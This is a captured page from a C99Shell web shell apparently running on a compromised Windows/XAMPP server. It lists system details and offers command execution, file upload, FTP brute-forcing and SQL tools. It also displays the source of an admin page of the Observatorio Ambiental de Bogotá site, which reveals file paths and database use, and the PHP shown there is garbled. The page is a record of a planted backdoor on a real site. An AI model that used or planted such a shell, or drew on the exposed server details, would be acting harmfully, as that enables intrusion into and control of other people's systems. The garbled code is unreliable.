!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\phpold\OAB\admin\   drwxrwxrwx
Free 7.27 GB of 239.26 GB (3.04%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     xindex.php (2.36 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php require_once('../Connections/oa.php'); ?>
<?php
mysql_select_db
($database_oa$oa);
$query_rsnivel1 "select *  from nivel1 order by idnivel1";
$rsnivel1 mysql_query($query_rsnivel1$oa) or die(mysql_error());
$row_rsnivel1 mysql_fetch_assoc($rsnivel1);
$totalRows_rsnivel1 mysql_num_rows($rsnivel1);
?>
<html>
<head>
<title>Administraci&oacute;n Observatorio Ambiental de Bogot&aacute;</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="css/adminestilos.css" rel="stylesheet" type="text/css">
</head>

<body>
<table width="600" border="1" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td class="titulos1"><p>M&oacute;dulo de Administraci&oacute;n del Observatorio 
        Ambiental de Bogot&aacute;.</p>
      <p class="textoblanco">&nbsp;</p></td>
  </tr>
  <tr>
    <td><span class="titulos1">Categor&iacute;as Principales del Observatorio:</span><br>
      <br>
      <table width="90%" border="1" align="center" cellpadding="0" cellspacing="0">
        <tr class="titulos1"> 
          <td><div align="center">Nombre secci&oacute;n</div></td>
          <td><div align="center">Tooltip</div></td>
          <td><div align="center">Color 1</div></td>
          <td><div align="center">Color 2</div></td>
          <td>&nbsp;</td>
          <td>&nbsp;</td>
        </tr>
        <?php do { ?>
        <tr> 
          <td width="35%" class="texto"><?php echo $row_rsnivel1['nombre']; ?></td>
          <td width="25%" class="texto"><?php echo $row_rsnivel1['tooltip']; ?></td>
          <td width="5%" bgcolor=<?php echo $row_rsnivel1['colorbase']; ?> class="texto"><?php echo $row_rsnivel1['colorbase']; ?></td>
          <td width="5%" bgcolor=<?php echo $row_rsnivel1['colordos']; ?> class="texto"><?php echo $row_rsnivel1['colordos']; ?></td>
          <td width="15%" class="texto"><div align="center"><a href="files/nivel1.php?id=<?php echo $row_rsnivel1['idnivel1']; ?>">Modificar</a></div></td>
          <td width="15%" class="texto"><div align="center">Ver 
              Contenidos</div></td>
        </tr>
        <?php } while ($row_rsnivel1 mysql_fetch_assoc($rsnivel1)); ?>
      </table>
      
    </td>
  </tr>
  <tr>
    <td><br>
      <a href="edit_contenidos.php">Editar Contenidos</a></td>
  </tr>
</table>
</body>
</html>
<?php
mysql_free_result
($rsnivel1);
?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--